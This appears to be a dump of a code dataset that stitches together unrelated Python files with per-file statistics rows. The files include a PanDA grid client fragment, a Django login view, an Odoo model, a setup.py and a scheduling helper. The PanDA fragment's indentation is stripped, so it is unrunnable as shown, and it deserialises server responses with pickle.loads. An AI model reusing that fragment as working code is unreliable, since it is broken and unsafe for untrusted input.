# check replica locations to use a well distributed DBRelease, i.e. to avoid a DBR that was just created
tmpLocations = getLocations(tmpName,[],'',False,verbose,getDQ2IDs=True)
if not checkEnoughSitesHaveDBR(tmpLocations):
continue
# check contents to exclude reprocessing DBR
tmpDbrFileMap = queryFilesInDataset(tmpName,verbose)
if len(tmpDbrFileMap) != 1 or not tmpDbrFileMap.keys()[0].startswith('DBRelease'):
continue
# higher or equal version
latestVerMajor = tmpVerMajor
latestVerMinor = tmpVerMinor
latestVerBuild = tmpVerBuild
latestVerRev = tmpVerRev
latestDBR = tmpName
# failed
if latestDBR == '':
tmpLog.error('failed to get the latest version of DBRelease dataset from DQ2')
sys.exit(EC_Failed)
# get DBRelease file name
tmpList = queryFilesInDataset(latestDBR,verbose)
if len(tmpList) == 0:
tmpLog.error('DBRelease=%s is empty' % latestDBR)
sys.exit(EC_Failed)
# return dataset:file
retVal = '%s:%s' % (latestDBR,tmpList.keys()[0])
tmpLog.info('use %s' % retVal)
return retVal
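
# Illustrative sketch (added example) of how the loop above slices the version
# digits of a hypothetical dataset name into major/minor/build/revision.
def _exampleDbrVersionParse():
    match = re.search('\.v(\d+)(_*[^\.]*)$', 'ddo.000001.Atlas.Ideal.DBRelease.v31070101')
    tmpVerStr = match.group(1)
    # -> (31, 7, 1, 1)
    return (int(tmpVerStr[0:2]), int(tmpVerStr[2:4]),
            int(tmpVerStr[4:6]), int(tmpVerStr[6:]))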
# get inconsistent datasets which are complete in DQ2 but not in LFC
def getInconsistentDS(missList,newUsedDsList):
if missList == [] or newUsedDsList == []:
return []
inconDSs = []
# loop over all datasets
for tmpDS in newUsedDsList:
# escape
if missList == []:
break
# get file list
tmpList = queryFilesInDataset(tmpDS)
newMissList = []
# look for missing files
for tmpFile in missList:
if tmpList.has_key(tmpFile):
# append
if not tmpDS in inconDSs:
inconDSs.append(tmpDS)
else:
# keep as missing
newMissList.append(tmpFile)
# use new missing list for the next dataset
missList = newMissList
# return
return inconDSs
# submit task
def insertTaskParams(taskParams,verbose,properErrorCode=False):
"""Insert task parameters
args:
taskParams: a dictionary of task parameters
returns:
status code
0: communication with the panda server succeeded
255: communication failure
tuple of return code and message from the server
0: request is processed
1: duplication in DEFT
2: duplication in JEDI
3: accepted for incremental execution
4: server error
"""
# serialize
taskParamsStr = json.dumps(taskParams)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/insertTaskParams'
data = {'taskParams':taskParamsStr,
'properErrorCode':properErrorCode}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
errtype,errvalue = sys.exc_info()[:2]
errStr = "ERROR insertTaskParams : %s %s" % (errtype,errvalue)
return EC_Failed,output+'\n'+errStr
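
# Illustrative sketch (added example): a minimal submission via insertTaskParams.
# The keys in taskParams are hypothetical placeholders, not a verified JEDI
# parameter list.
def _exampleInsertTask():
    taskParams = {'taskName': 'user.someone.mytask', 'userName': 'someone'}
    status, ret = insertTaskParams(taskParams, False, properErrorCode=True)
    if status == 0:
        retCode, retMsg = ret
        print "server returned %s : %s" % (retCode, retMsg)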
# get history of job retry
def getRetryHistory(jediTaskID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getRetryHistory'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getRetryHistory : %s %s" % (type,value)
return EC_Failed,None
# get PanDA IDs with TaskID
def getPandaIDsWithTaskID(jediTaskID,verbose=False):
"""Get PanDA IDs with TaskID
args:
jediTaskID: jediTaskID of the task to get the list of PanDA IDs for
returns:
status code
0: communication with the panda server succeeded
255: communication failure
the list of PanDA IDs
"""
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getPandaIDsWithTaskID'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getPandaIDsWithTaskID : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# reactivate task
def reactivateTask(jediTaskID,verbose=False):
"""Reactivate task
args:
jediTaskID: jediTaskID of the task to be reactivated
returns:
status code
0: communication with the panda server succeeded
255: communication failure
return: a tuple of return code and message
0: unknown task
1: succeeded
None: database error
"""
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/reactivateTask'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
errtype,errvalue = sys.exc_info()[:2]
errStr = "ERROR reactivateTask : %s %s" % (errtype,errvalue)
return EC_Failed,output+'\n'+errStr
# get task status TaskID
def getTaskStatus(jediTaskID,verbose=False):
"""Get task status
args:
jediTaskID: jediTaskID of the task to get the status of
returns:
status code
0: communication with the panda server succeeded
255: communication failure
the status string
"""
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getTaskStatus'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getTaskStatus : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# get taskParamsMap with TaskID
def getTaskParamsMap(jediTaskID):
"""Get task status
args:
jediTaskID: jediTaskID of the task to get taskParamsMap
returns:
status code
0: communication succeeded to the panda server
255: communication failure
return: a tuple of return code and taskParamsMap
1: logical error
0: success
None: database error
"""
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getTaskParamsMap'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getTaskParamsMap : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# get T1 sites
def getTier1sites():
global PandaTier1Sites
PandaTier1Sites = []
# FIXME : will be simplified once schedconfig has a tier field
for tmpCloud,tmpCloudVal in PandaClouds.iteritems():
for tmpDQ2ID in tmpCloudVal['tier1SE']:
# ignore NIKHEF
if tmpDQ2ID.startswith('NIKHEF'):
continue
# convert DQ2 ID to Panda Sites
tmpPandaSites = convertDQ2toPandaIDList(tmpDQ2ID)
for tmpPandaSite in tmpPandaSites:
if not tmpPandaSite in PandaTier1Sites:
PandaTier1Sites.append(tmpPandaSite)
# set X509_CERT_DIR
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : setting X509_CERT_DIR"
if not os.environ.has_key('X509_CERT_DIR') or os.environ['X509_CERT_DIR'] == '':
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
os.environ['X509_CERT_DIR'] = tmp_x509_CApath
else:
os.environ['X509_CERT_DIR'] = '/etc/grid-security/certificates'
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : imported %s" % __name__
| 34.757889 | 149 | 0.555796 | 12,948 | 127,770 | 5.439527 | 0.108743 | 0.017492 | 0.017208 | 0.017308 | 0.402507 | 0.363207 | 0.339382 | 0.318397 | 0.298434 | 0.272011 | 0 | 0.01331 | 0.341982 | 127,770 | 3,675 | 150 | 34.767347 | 0.824407 | 0.103084 | 0 | 0.500369 | 0 | 0.002214 | 0.121755 | 0.011996 | 0 | 0 | 0 | 0.000544 | 0 | 0 | null | null | 0.007011 | 0.008487 | null | null | 0.042435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0e1612123e14f431ace50f65fe276956a0f82853 | 815 | py | Python | tests/test_use_profile.py | popadi/git-profile | ca20173f63f57c21868c4c49c1e5c515d4bc87fd | ["MIT"] | 3 | 2019-08-24T19:24:49.000Z | 2019-08-30T09:44:46.000Z | tests/test_use_profile.py | sturmianseq/git-profiles | ca20173f63f57c21868c4c49c1e5c515d4bc87fd | ["MIT"] | 9 | 2019-09-01T13:25:25.000Z | 2019-09-05T19:52:25.000Z | tests/test_use_profile.py | popadi/git-profile | ca20173f63f57c21868c4c49c1e5c515d4bc87fd | ["MIT"] | 2 | 2020-09-14T16:22:26.000Z | 2021-08-15T08:24:09.000Z |
import os
import sys
import pytest
from random import randrange

myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + "/../")

import src.utils.messages as msg
from src.executor import executor, parser
from src.git_manager.git_manager import GitManager


@pytest.fixture(autouse=True)
def prepare():
    git = GitManager({})
    yield git


class TestUseProfiles:
    def test_use_not_exist(self, capsys):
        arg_parser = parser.get_arguments_parser()
        # Set an account locally
        fake_profile = "profile-{0}".format(randrange(100000))
        arguments = arg_parser.parse_args(["use", fake_profile])
        executor.execute_command(arguments)
        out, err = capsys.readouterr()
        assert not err
        assert msg.ERR_NO_PROFILE.format(fake_profile) in out
| 25.46875 | 64 | 0.710429 | 108 | 815 | 5.175926 | 0.546296 | 0.059034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012103 | 0.188957 | 815 | 31 | 65 | 26.290323 | 0.833585 | 0.026994 | 0 | 0 | 0 | 0 | 0.022756 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.318182 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
385257dce453f9dc6b74ab4ff222f4ac8563e40e | 1,997 | py | Python | server/editors/views.py | nickdotreid/opioid-mat-decision-aid | bbc2a0d8931d59cd6ab64b0b845e88c8dc1af5d1 | ["MIT"] | null | null | null | server/editors/views.py | nickdotreid/opioid-mat-decision-aid | bbc2a0d8931d59cd6ab64b0b845e88c8dc1af5d1 | ["MIT"] | 27 | 2018-09-30T07:59:21.000Z | 2020-11-05T19:25:41.000Z | server/editors/views.py | nickdotreid/opioid-mat-decision-aid | bbc2a0d8931d59cd6ab64b0b845e88c8dc1af5d1 | ["MIT"] | null | null | null |
from django.contrib.auth import authenticate
from django.shortcuts import render
from rest_framework import serializers
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.authtoken.models import Token
from rest_framework.response import Response

from .models import Editor
from .models import User


class EditorAuthTokenSerializer(serializers.Serializer):
    email = serializers.EmailField()
    password = serializers.CharField(
        trim_whitespace = False
    )


class EditorLogin(APIView):

    def post(self, request, *args, **kwargs):
        serializer = EditorAuthTokenSerializer(
            data=request.data
        )
        if not serializer.is_valid():
            return Response(
                data = serializer.errors,
                status = status.HTTP_400_BAD_REQUEST
            )
        email = serializer.validated_data['email']
        password = serializer.validated_data['password']
        try:
            user = User.objects.get(email = email)
        except User.DoesNotExist:
            return Response(
                'User does not exist',
                status = status.HTTP_401_UNAUTHORIZED
            )
        if not user.is_staff:
            # non-staff users must also have an Editor record
            try:
                editor = Editor.objects.get(user__email=email)
            except Editor.DoesNotExist:
                return Response(
                    'Editor does not exist',
                    status = status.HTTP_401_UNAUTHORIZED
                )
        user = authenticate(
            request=request,
            username=user.username,
            password=password
        )
        if not user:
            return Response(
                'Incorrect password',
                status = status.HTTP_401_UNAUTHORIZED
            )
        token, created = Token.objects.get_or_create(user=user)
        return Response(
            data = {
                'email': user.email,
                'token': token.key
            }
        )
| 31.203125 | 63 | 0.589885 | 188 | 1,997 | 6.143617 | 0.340426 | 0.034632 | 0.073593 | 0.049351 | 0.101299 | 0.074459 | 0.074459 | 0.074459 | 0 | 0 | 0 | 0.009146 | 0.343015 | 1,997 | 63 | 64 | 31.698413 | 0.871189 | 0 | 0 | 0.172414 | 0 | 0 | 0.040561 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017241 | false | 0.068966 | 0.155172 | 0 | 0.327586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
385fbc5a17a50e64c4dcfcdc7d4027af3cdc018a | 1,688 | py | Python | Modules/Projects/models/project.py | Carlosma7/Odoo | c234fcc18d15d4d8369e237286bee610fd76ceee | ["CC0-1.0"] | null | null | null | Modules/Projects/models/project.py | Carlosma7/Odoo | c234fcc18d15d4d8369e237286bee610fd76ceee | ["CC0-1.0"] | null | null | null | Modules/Projects/models/project.py | Carlosma7/Odoo | c234fcc18d15d4d8369e237286bee610fd76ceee | ["CC0-1.0"] | null | null | null |
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import ValidationError


# Class for project management and their relationships
class Projects(models.Model):
    # Name of table
    _name = "projects.project"

    # Simple fields of the object
    name = fields.Char(string="Project title", required=True)
    identifier = fields.Char(string="ID", required=True)
    locality = fields.Char(string="Locality")
    province = fields.Char(string="Province")
    start_date = fields.Date(string="Start date")

    # Relational fields with other classes
    department_ids = fields.Many2one('projects.department', string="Department") # department_id
    employee_id = fields.Many2many('projects.employee', string="Employees") # employee_ids

    # Constraint on the employees working in the project
    @api.constrains('employee_id')
    @api.multi
    def _check_department(self):
        for record in self:
            # If we have a department
            if record.department_ids:
                # Iterate over all employees selected for the project
                for employee_x in record.employee_id:
                    # If an employee doesn't belong to the project's department, raise a ValidationError
                    # (compare by value; 'is not' would compare object identity)
                    if employee_x.department_id.name != record.department_ids.name:
                        raise ValidationError("Employee %s is not valid because he doesn't belong to the project's department." % employee_x.name)


# Extension class for the project class
class PriorityProjects(models.Model):
    # We inherit from the project class and use the same table
    _inherit = 'projects.project'
    # Add a new field to save the deadline of a project
limit_date = fields.Date(string="Limit date", required=True) | 41.170732 | 129 | 0.742299 | 234 | 1,688 | 5.277778 | 0.380342 | 0.048583 | 0.051822 | 0.032389 | 0.02753 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002147 | 0.172393 | 1,688 | 41 | 130 | 41.170732 | 0.88189 | 0.331161 | 0 | 0 | 0 | 0 | 0.212093 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.681818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
385fcab1d94b44c44b147f9d7caf4a23de41ae7a | 402 | py | Python | models/food.py | ByK95/food_order | c3a40f00128cc381894b80b61ca6b919bbf49c4e | ["MIT"] | 1 | 2022-01-20T10:30:05.000Z | 2022-01-20T10:30:05.000Z | models/food.py | ByK95/food_order | c3a40f00128cc381894b80b61ca6b919bbf49c4e | ["MIT"] | null | null | null | models/food.py | ByK95/food_order | c3a40f00128cc381894b80b61ca6b919bbf49c4e | ["MIT"] | null | null | null |
from app.shared.models import db
from app.models.mixins import ModelMixin


class Food(ModelMixin, db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(255), nullable=False)
    category_id = db.Column(db.Integer, db.ForeignKey("category.id"), nullable=False)
    restourant_id = db.Column(
        db.Integer, db.ForeignKey("restourant.id"), nullable=False
    )
| 33.5 | 85 | 0.716418 | 57 | 402 | 5 | 0.438596 | 0.112281 | 0.140351 | 0.126316 | 0.284211 | 0.217544 | 0.217544 | 0 | 0 | 0 | 0 | 0.008798 | 0.151741 | 402 | 11 | 86 | 36.545455 | 0.826979 | 0 | 0 | 0 | 0 | 0 | 0.059701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
386175f2b9107f26e003609e3390ad4e1d9fa916 | 1,574 | py | Python | setup.py | sjkingo/ticketus | 90f2781af9418e9e2c6470ca50c9a6af9ce098ff | ["BSD-2-Clause"] | 3 | 2019-02-09T10:52:55.000Z | 2021-09-19T14:14:36.000Z | setup.py | sjkingo/ticketus | 90f2781af9418e9e2c6470ca50c9a6af9ce098ff | ["BSD-2-Clause"] | null | null | null | setup.py | sjkingo/ticketus | 90f2781af9418e9e2c6470ca50c9a6af9ce098ff | ["BSD-2-Clause"] | 3 | 2018-03-04T18:05:02.000Z | 2021-09-19T14:14:38.000Z |
from setuptools import find_packages, setup
from ticketus import __version__ as version

setup(
    name='ticketus',
    version=version,
    license='BSD',
    author='Sam Kingston',
    author_email='sam@sjkwi.com.au',
    description='Ticketus is a simple, no-frills ticketing system for helpdesks.',
    url='https://github.com/sjkingo/ticketus',
    install_requires=[
        'Django >= 1.6.10',
        'IMAPClient',
        'django-grappelli',
        'email-reply-parser',
        'mistune',
        'psycopg2',
        'python-dateutil',
    ],
    zip_safe=False,
    include_package_data=True,
    packages=find_packages(exclude=['ticketus_settings']),
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'Intended Audience :: End Users/Desktop',
        'Intended Audience :: Information Technology',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python',
        'Topic :: Communications :: Email',
        'Topic :: Software Development :: Bug Tracking',
        'Topic :: System :: Systems Administration',
    ],
    scripts=[
        'import_scripts/ticketus_import_freshdesk',
        'import_scripts/ticketus_import_github',
        'bin_scripts/ticketus_mailgw_imap4',
        'bin_scripts/ticketus-admin',
    ],
)
| 32.791667 | 82 | 0.625159 | 152 | 1,574 | 6.328947 | 0.611842 | 0.066528 | 0.077963 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009306 | 0.249047 | 1,574 | 47 | 83 | 33.489362 | 0.804569 | 0 | 0 | 0.066667 | 0 | 0 | 0.564168 | 0.086404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.088889 | 0 | 0.088889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3869ffe900c403550a635fd5893cce20c49720b4 | 298 | py | Python | infra/controllers/errors/NotFoundError.py | JVGC/MyFinancesPython | 5e4ac02ea00c4ddab688dd0093eed3f3fb2ad826 | ["MIT"] | null | null | null | infra/controllers/errors/NotFoundError.py | JVGC/MyFinancesPython | 5e4ac02ea00c4ddab688dd0093eed3f3fb2ad826 | ["MIT"] | null | null | null | infra/controllers/errors/NotFoundError.py | JVGC/MyFinancesPython | 5e4ac02ea00c4ddab688dd0093eed3f3fb2ad826 | ["MIT"] | null | null | null |
from infra.controllers.contracts import HttpResponse
class NotFoundError(HttpResponse):
    def __init__(self, message) -> None:
        status_code = 404
        self.message = message
        body = {
            'message': self.message
        }
        super().__init__(body, status_code)
| 19.866667 | 52 | 0.620805 | 29 | 298 | 6.034483 | 0.62069 | 0.188571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014151 | 0.288591 | 298 | 14 | 53 | 21.285714 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0.02349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3872e9a2f5c1058e44e25d6f8294aa9843e070f9 | 341 | py | Python | Items/Armors/Chest.py | saisua/RAF-Game | 79b2b618aa18c31a40c080865b58fac02c1cac68 | ["MIT"] | null | null | null | Items/Armors/Chest.py | saisua/RAF-Game | 79b2b618aa18c31a40c080865b58fac02c1cac68 | ["MIT"] | null | null | null | Items/Armors/Chest.py | saisua/RAF-Game | 79b2b618aa18c31a40c080865b58fac02c1cac68 | ["MIT"] | null | null | null |
from .Armor import Armor
class Chest(Armor):
    LIFE_PER_LEVEL = 100
    PROTECTION_PER_LEVEL = 5
    DAMAGE_PART = 1.2

    def __init__(self, owner, level: int = None, life: int = None, protection: int = None):
        self.name = "Chest armor"
        super().__init__(owner, owner.level if level is None else level, life, protection)
| 26.230769 | 90 | 0.668622 | 49 | 341 | 4.387755 | 0.530612 | 0.097674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022901 | 0.231672 | 341 | 13 | 91 | 26.230769 | 0.79771 | 0 | 0 | 0 | 0 | 0 | 0.032164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
3877c817f150e95b91b3d8ee611f5c78f11d6109 | 4,121 | py | Python | executiontime_calculator.py | baumartig/paperboy | 01659cda235508eac66a50a9c16c4a6c531015bd | ["Apache-2.0"] | 3 | 2015-02-26T06:39:40.000Z | 2017-07-04T14:56:18.000Z | executiontime_calculator.py | baumartig/paperboy | 01659cda235508eac66a50a9c16c4a6c531015bd | ["Apache-2.0"] | null | null | null | executiontime_calculator.py | baumartig/paperboy | 01659cda235508eac66a50a9c16c4a6c531015bd | ["Apache-2.0"] | 1 | 2018-02-21T00:12:06.000Z | 2018-02-21T00:12:06.000Z |
from datetime import datetime
from datetime import timedelta

from job import WEEKDAYS
from job import Job


def calculateNextExecution(job, now=None):
    # a datetime.now() default argument would be evaluated only once, at
    # import time, so resolve the current time at call time instead
    if now is None:
        now = datetime.now()
    executionTime = now.replace()
    if job.executionType == "weekly":
        diff = WEEKDAYS.index(job.executionDay) - now.weekday()
        if diff < 0 and now.day < (-1 * diff):
            diff += now.day
            # replace() returns a new datetime, so assign the result back
            executionTime = executionTime.replace(month=executionTime.month - 1)
        executionTime = executionTime.replace(day=now.day + diff)
    elif job.executionType == "monthly":
        executionTime = executionTime.replace(day=job.executionDay)
    # add the calculated difference
    executionTime = executionTime.replace(hour=job.executionTime.hour,
                                          minute=job.executionTime.minute,
                                          second=job.executionTime.second,
                                          microsecond=job.executionTime.microsecond)
    addition = timedelta()
    if now > executionTime:
        # add interval
        if job.executionType == "daily":
            addition = timedelta(days=1)
        if job.executionType == "weekly":
            addition = timedelta(weeks=1)
        elif job.executionType == "monthly":
            if executionTime.month < 12:
                executionTime = executionTime.replace(month=executionTime.month + 1)
            else:
                executionTime = executionTime.replace(month=1)
    # add the delta
    executionTime = executionTime + addition
    # set the next execution date on the job
    job.nextExecution = executionTime


def test():
    test_monthly()
    test_weekly()
    testDaily()
    return


def test_monthly():
    print "TEST Monthly"
    job = Job("testRef")
    now = datetime(2014, 2, 2, 10)
    # execute later
    addition = timedelta(hours=1)
    job.setExecution("monthly", (now + addition).time(), now.day)
    calculateNextExecution(job, now)
    assert datetime(2014, 2, 2, 11) == job.nextExecution, "Calculated wrong execution date: %s" \
        % str(job.nextExecution)
    # execute tomorrow
    addition = timedelta(hours=-1)
    job.setExecution("monthly", (now + addition).time(), now.day)
    calculateNextExecution(job, now)
    assert datetime(2014, 3, 2, 9) == job.nextExecution, "Calculated wrong execution date: %s" \
        % str(job.nextExecution)
    print "OK"


def test_weekly():
    print "TEST Weekly"
    job = Job("testRef")
    now = datetime(2014, 2, 2, 10)
    # execute later
    addition = timedelta(hours=1)
    job.setExecution("weekly", (now + addition).time(), "So")
    calculateNextExecution(job, now)
    assert datetime(2014, 2, 2, 11) == job.nextExecution, "Calculated wrong execution date: %s" \
        % str(job.nextExecution)
    # execute tomorrow
    addition = timedelta(hours=-1)
    job.setExecution("weekly", (now + addition).time(), "So")
    calculateNextExecution(job, now)
    assert datetime(2014, 2, 9, 9) == job.nextExecution, "Calculated wrong execution date: %s" \
        % str(job.nextExecution)
    print "OK"


def testDaily():
    print "TEST Daily"
    job = Job("testRef")
    now = datetime(2014, 2, 2, 10)
    # execute later
    addition = timedelta(hours=1)
    job.setExecution("daily", (now + addition).time())
    calculateNextExecution(job, now)
    assert datetime(2014, 2, 2, 11) == job.nextExecution, "Calculated wrong execution date: %s" \
        % str(job.nextExecution)
    # execute tomorrow
    addition = timedelta(hours=-1)
    job.setExecution("daily", (now + addition).time())
    calculateNextExecution(job, now)
    assert datetime(2014, 2, 3, 9) == job.nextExecution, "Calculated wrong execution date: %s" \
        % str(job.nextExecution)
    print "OK"


if __name__ == '__main__':
    test()
| 33.504065 | 100 | 0.580199 | 408 | 4,121 | 5.830882 | 0.176471 | 0.087432 | 0.043716 | 0.035309 | 0.562842 | 0.562842 | 0.525851 | 0.525851 | 0.525851 | 0.525851 | 0 | 0.029588 | 0.31109 | 4,121 | 122 | 101 | 33.778689 | 0.808383 | 0.045377 | 0 | 0.481928 | 0 | 0 | 0.088963 | 0 | 0 | 0 | 0 | 0 | 0.072289 | 0 | null | null | 0 | 0.048193 | null | null | 0.072289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |